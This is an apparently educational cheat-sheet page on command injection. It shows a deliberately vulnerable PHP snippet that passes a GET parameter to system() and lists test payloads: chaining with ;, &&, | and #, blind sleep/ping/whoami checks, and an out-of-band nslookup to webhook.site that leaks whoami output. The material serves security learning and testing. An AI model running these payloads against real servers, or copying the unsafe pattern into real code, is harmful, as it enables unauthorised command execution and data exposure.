Command injection
What is it?
Command injection is a vulnerability that allows an attacker to manipulate an application to execute arbitrary system commands on the server. This occurs when an application passes unsafe data, often user input, to a system shell.
A simple example
A vulnerable web application might take a path from a query parameter and use it to read a file, like so:
$file = $_GET['file'];
system("cat /var/www/html/$file");
If an attacker uses a payload such as ; ls -la
in the file
parameter, they can make the application execute an additional command that lists all files in the current directory.
The server then executes the cat
command and the ls
command and the attacker receives a list of all files in the current directory.
Command injection can often lead to:
Remote code execution
Denial of Service
Data breach
Privilege escalation
Other learning resources:
Writeups:
Bullets
Checklist
Exploitation
Basic command chaining
; ls -la
Using logic operators
&& ls -la
Commenting out the rest of a command
; ls -la #
Using a pipe for command chaining
| ls -la
Testing for blind injection
; sleep 10
; ping -c 10 127.0.0.1
& whoami > /var/www/html/whoami.txt &
Out-of-band testing
& nslookup webhook.site/<id>?`whoami` &
Last updated
Was this helpful?